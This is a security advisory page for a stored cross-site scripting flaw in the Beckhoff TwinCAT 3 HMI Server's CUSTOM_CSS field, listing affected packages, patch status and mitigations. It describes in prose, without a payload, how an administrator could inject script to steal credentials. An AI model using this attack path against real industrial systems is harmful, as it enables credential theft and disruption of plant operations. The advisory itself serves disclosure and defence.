Beckhoff: XSS Vulnerability in TwinCAT 3 HMI Server

Monitor5.5VDE-2025-106Jan 26, 2026

Attack VectorNetwork

Auth RequiredHigh

ComplexityLow

User InteractionNone needed

Summary

A cross-site scripting (XSS) vulnerability exists in the TwinCAT 3 HMI Server configuration page. An administrator can upload arbitrary content into the CUSTOM_CSS field, which is stored on the device and rendered in the login and error pages. This allows malicious code injection that executes whenever users access the HMI. The vulnerability affects TwinCAT.HMI.Server package and TF2000-HMI-Server software on multiple platforms. Beckhoff has released fixes for the BSD and npm packages, but no patch is currently available for the Linux ARM64 and AMD64 variants.

What this means

What could happen

An administrator with access to the TwinCAT 3 HMI Server configuration page could inject malicious code that executes when other users log in, potentially redirecting credentials or disrupting HMI operations. This requires admin credentials and user interaction, limiting immediate risk but creating a persistence mechanism on the control system.

Who's at risk

Manufacturing facilities using Beckhoff TwinCAT 3 HMI Server for process visualization and control system interfaces. Affects vendors running the optional HMI server package on TwinCAT BSD systems and Linux-based real-time controllers (both ARM64 and AMD64 architectures). The vulnerability impacts any plant using the server configuration page for HMI customization.

How it could be exploited

An attacker with admin credentials accesses the HMI server configuration page and injects JavaScript into the CUSTOM_CSS field. The malicious code is stored on the device and automatically executed in the browsers of any user who logs in or sees an error page, allowing credential theft or session hijacking.

Prerequisites

Administrator credentials for TwinCAT 3 HMI Server
Access to the HMI server configuration page (admin-only UI)
User must log in or view an error page to trigger code execution

remotely exploitablerequires administrator credentialslow complexityaffects visualization and HMI systems

Exploitability

Low exploit probability (EPSS 0.1%)

Affected products (4)

2 with fix2 pending

ProductAffected VersionsFix Status

TwinCAT.HMI.Server tcpkg package <14.4.267< 14.4.267vers:npm/14.4.267

TF2000-HMI-Server OS software package for TwinCAT/BSD <14.4.267< 14.4.26714.4.267

tf2000-hmi-server OS software package for Beckhoff RT Linux(R) on ARM64 <14.4.267< 14.4.267No fix yet

tf2000-hmi-server for Beckhoff RT Linux(R) on AMD64 <14.4.267< 14.4.267No fix yet

Remediation & Mitigation

0/4

Do now

0/1

WORKAROUNDFor TwinCAT/Linux ARM64 and AMD64 systems: Contact Beckhoff support to confirm patch timeline since no fix is currently available; restrict admin access to the HMI server configuration page to trusted personnel only in the interim

Schedule — requires maintenance window

0/3

Patching may require device reboot — plan for process interruption

HOTFIXUpdate TwinCAT.HMI.Server tcpkg package to version 14.4.267 or later

HOTFIXUpdate TF2000-HMI-Server OS software package for TwinCAT/BSD to version 14.4.267 or later

HARDENINGAudit HMI server configuration pages for unexpected content in the CUSTOM_CSS field, and review admin access logs for unauthorized configuration changes

CVEs (1)

CVE-2025-41768

View full CERT@VDE advisory

↑↓ Navigate · Esc Close

API: /api/v1/advisories/93ae594c-d332-4964-bb51-5d5b9f46e962